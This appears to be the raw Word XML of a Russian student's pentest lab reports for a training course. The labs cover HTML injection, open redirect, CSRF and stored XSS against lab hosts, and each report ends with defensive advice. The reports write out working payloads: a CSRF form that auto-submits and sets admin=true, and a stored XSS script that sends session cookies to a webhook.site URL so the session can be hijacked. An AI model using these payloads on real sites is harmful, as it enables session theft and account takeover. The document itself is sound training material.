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8"/>
          <w:szCs w:val="28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Отчет по пентесту-номер задания 14.5.1 модуля 14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Персонализация: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Ермакова Наталья Олеговна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(natalysoliton@mail.ru)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Лабораторная работа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yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">№14.2. «HTML Injection»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111111"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">и отчёт по пентесту</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="111111"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005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Период тестирования: 27.11.2022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006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Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="00a928"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://51.250.73.193:8082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Описание действий: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Зашла на страницу </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="00a928"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://51.250.73.193:8082</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и проверила все полля-формы ввода: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 поле Search ввела html-тег, например, &lt;h1&gt;text&lt;/h1&gt;. Сообщение не добавилось на страницу, значит ищу дальше поле, которое уязвимо.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Ввожу произвольный текст в теге &lt;h1&gt; в каждое поле, публикую на сайт и вижу, что два поля Name, Comment уязвимы, а поле с Email-нет, значит можно использовать одно из двух, например, Comment.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28600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8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Для получения флага делаю следующее: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заполняю первые два поля произвольным набором букв, а в поле Comment пишу &lt;form&gt;test&lt;/form&gt;.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425700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2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Публикую и вижу флаг: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781300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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8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Вопросы для самопроверки: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использовалось ручное исследование полей ввода-форм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совет по защите кода - разработчикам укреплять поля ввода и вывода (если он содержит какой-либо код сценария или любой HTML-код. Обычно проверяется, содержит ли код какой-либо специальный скрипт или скобки HTML: &lt;script&gt; &lt;/script&gt;, &lt;html&gt; &lt;/html&gt;.)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мне кажется уязвимость Low опасности по шкале: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114925" cy="2305050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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2305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rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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Отчет по пентесту-номер задания 14.5.1 модуля 14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Персонализация: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Ермакова Наталья Олеговна (natalysoliton@mail.ru)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Лабораторная работа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yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">14.3. Лабораторная работа «Open Redirect»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111111"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">и отчёт по пентесту</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="111111"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022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Период тестирования: 27.11.2022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023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Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12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http://51.250.73.193:8081/</w:t>
        </w:r>
      </w:hyperlink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Описание действий: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Зашла на страницу </w:t>
      </w:r>
      <w:hyperlink r:id="rId13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http://51.250.73.193:8081/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, нажала на кнопку Catalog</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и прокликала все элементы сайта с поиском элемента редиректа. Можно еще открыть код страницы и поискать данный след, например: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435100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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3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Open redirection происходит при нажатии на кнопку Buy.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На закладке Report Admin есть поля ввода, через которые буду вводить комбинацию из url- где нашлайсь уязвимость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http://51.250.73.193:8081/catalog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://webhook.site/8b4ccf57-49ca-4945-b532-c318ace0abb5</w:t>
        </w:r>
      </w:hyperlink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, взятый из webhook.site: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800100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16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0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нажимаю на кнопку Report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781300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8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Получила флаг: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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5172075" cy="1390650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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1390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Вопросы для самопроверки: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after="0" w:afterAutospacing="0" w:befor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использовалось ручное исследование полей ввода-форм и </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Webhook.site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совет по защите кода - разработчикам не использовать перенаправления. Если все-же используют перенаправления на сайтах, веб-приложениях, то обезопасить можно следующим образом: </w:t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Используйте список фиксированных целевых страниц. Храните их полные URL-адреса в таблице базы данных и вызывайте их, используя идентификаторы в качестве параметров запроса, а не сами URL-адреса. Например, сохраните http://example2.com в таблице базы данных с идентификатором 42, а затем используйте следующий вызов для перенаправления на example2.com: https://example.com/redirect.php?redir_id=42.</w:t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Если вы не можете использовать фиксированный список целей перенаправления, отфильтруйте ненадежный ввод (если можете, используйте белый список, а не черный список).</w:t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Обязательно проверьте наличие неполных строк.</w:t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Кроме того, запретите все протоколы, кроме HTTP и HTTPS. Также обратите внимание, что, несмотря на все ваши усилия, злоумышленники могут найти способ обойти ваши фильтры.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мне кажется уязвимость Low опасности по шкале:</w:t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114925" cy="2305050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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2305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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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Отчет по пентесту-номер задания 14.5.1 модуля 14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Персонализация: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Ермакова Наталья Олеговна (natalysoliton@mail.ru)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E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Лабораторная работа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yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">14.4. Лабораторная работа «CSRF»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111111"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">и отчёт по пентесту</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="111111"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040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Период тестирования: 27.11.2022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041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Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20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http://51.250.73.193:5002/</w:t>
        </w:r>
      </w:hyperlink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Описание действий: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Зашла на сайт и зарегистрировалась. Проверила каждый элемент сайта на возможную уязвимость. Для данной задачи оказалось поле Profile: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311400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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1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Открыла код страницы, чтобы поискать параметры, которые связаны с админом.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108200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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0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Чтобы сделать правильный запрос в поле ввода, необходимо проверить какой метод используется с помощью Burp Community, метод POST параметр edit_profile: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501900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21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0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поле ввода добавляю метод, параметр, строки из кода страницы без параметров стиля и строку скрипта в конце:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B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&lt;form action="/edit_profile" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C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&lt;input name="name" type="text" value="naterm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D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&lt;textarea name="profile" value="naterm"&gt;&lt;/textarea&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E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&lt;input type="checkbox" name="admin" value="true" checked&gt;Admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F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&lt;input class="btn" type="submit" value="APPLY CHANGES"&gt;&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050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&lt;script&gt;document.forms[0].submit();&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051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2743200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19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Нажимаю Apply Changes, сайт начинает глючить, зависать. Перелогиниваюсь и вижу флаг:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053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305425" cy="2228850"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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2228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Вопросы для самопроверки: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spacing w:after="0" w:afterAutospacing="0" w:befor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использовалось ручное исследование сайта и для определения метода и параметра  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite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совет по защите кода - использовать CSRF-токен и Same-Site Cookies (*см.пояснение в самом низу)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мне кажется уязвимость High опасности по шкале:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:spacing w:after="240" w:before="24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114925" cy="2305050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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2305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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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Отчет по пентесту-номер задания 14.5.1 модуля 14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Персонализация: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Ермакова Наталья Олеговна (natalysoliton@mail.ru)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077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Лабораторная работа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yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">14.5. Лабораторная работа «XSS stored»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111111"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">и отчёт по пентесту</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="111111"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079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Период тестирования: 27.11.2022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A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Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26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http://51.250.73.193:5001/</w:t>
        </w:r>
      </w:hyperlink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Описание действий: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Зашла на сайт и зарегистрировалась. Проверила каждый элемент сайта на возможную уязвимость. Для данной задачи оказалось все поля закладки Vacation:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5091113" cy="4118558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91113" cy="41185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В поле Message ввела строку скрипта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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&lt;script&gt;document.location='</w:t>
      </w:r>
      <w:hyperlink r:id="rId28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https://webhook.site/8b4ccf57-49ca-4945-b532-c318ace0abb5</w:t>
        </w:r>
      </w:hyperlink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?'+document.cookie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Перехватываю кукии сессии:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080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1917700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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1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Необходимые куки брала:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082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3987800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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8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Перелогинилась на сайте. Включила FoxyProxy, Intercept is on в Burp Suite, заменила сессию куки, скопированной строчкой из webhook.site. Нажала Forward.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084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2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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8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Перешла на сайт и увидела флаг:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086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2489200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8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Вопросы для самопроверки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:befor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использовалось ручное исследование сайта на наличие слабых форм, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite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замены куки, сгенерированной сессией в </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webhook.site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совет по защите кода - использовать флаг HttpOnly или фильтрацию (изменение данных, введенных пользователем, с целью повышения уровня безопасности).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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мне кажется уязвимость High опасности по шкале:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C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114925" cy="2305050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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2305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*Пояснение для защиты от CSRF-уязвимости:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F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1) CSRF-токен</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090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Самый надёжный способ защиты от CSRF-атак - включить CSRF-токен в соответствующие запросы. Токен должен:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091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быть непредсказуемым, с высокой энтропией, как и для токенов сессий в целом;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093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быть привязан к сеансу пользователя;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094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строго проверяться в каждом случае перед выполнением соответствующего действия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095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CSRF-токен работает следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096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Веб-сервер генерирует токен и сохраняет его.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098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Токен статически установлен как скрытое поле формы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099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Форма отправлена пользователем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A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Токен включен в данные POST-запроса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B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Приложение сравнивает токен, сгенерированный и сохраненный приложением, с токеном, отправленным в запросе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C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Если эти токены совпадают, запрос действителен.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D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Если эти токены не совпадают, запрос недействителен и отклоняется.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E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Этот метод защиты CSRF называется synchronizer token pattern. Он защищает форму от атак с подделкой межсайтовых запросов, поскольку злоумышленнику также необходимо угадать токен, чтобы успешно обманом заставить жертву отправить действительный запрос. Маркер также должен стать недействительным через некоторое время и после выхода пользователя из системы. Токены Anti-CSRF часто предоставляются через AJAX: отправляются в виде заголовков или параметров запроса с запросами AJAX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F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2) Same-Site Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1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Атаки CSRF возможны только потому, что файлы cookie всегда отправляются с любыми запросами, отправленными в конкретный источник, связанный с этим файлом cookie. Вы можете установить флаг для cookie, который превращает его в cookie того же сайта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2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Файл cookie того же сайта — это файл cookie, который может быть отправлен только в том случае, если запрос выполняется из источника, связанного с файлом cookie (не междоменным). Считается, что cookie и источник запроса имеют одинаковое происхождение, если протокол, порт (если применимо) и хост (но не IP-адрес) одинаковы для обоих.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4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Текущее ограничение same-site cookies заключается в том, что, в отличии, например, от Chrome или Firefox, не все текущие браузеры поддерживают их, а старые браузеры не работают с веб-приложениями, которые используют cookie одного сайта. На данный момент cookie одного и того же сайта лучше подходят в качестве дополнительного уровня защиты из-за этого ограничения. Следовательно, вы должны использовать их только вместе с другими механизмами защиты от CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6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rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman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51.250.73.193:5002/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:5001/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webhook.site/8b4ccf57-49ca-4945-b532-c318ace0abb5?'+document.cookie" TargetMode="External"/><Relationship Id="rId27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hyperlink" Target="http://51.250.73.193:8082/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webhook.site/8b4ccf57-49ca-4945-b532-c318ace0abb5?'+document.cookie" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:8082/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:8081/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:8081/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:8081/catalog" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webhook.site/8b4ccf57-49ca-4945-b532-c318ace0abb5" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId1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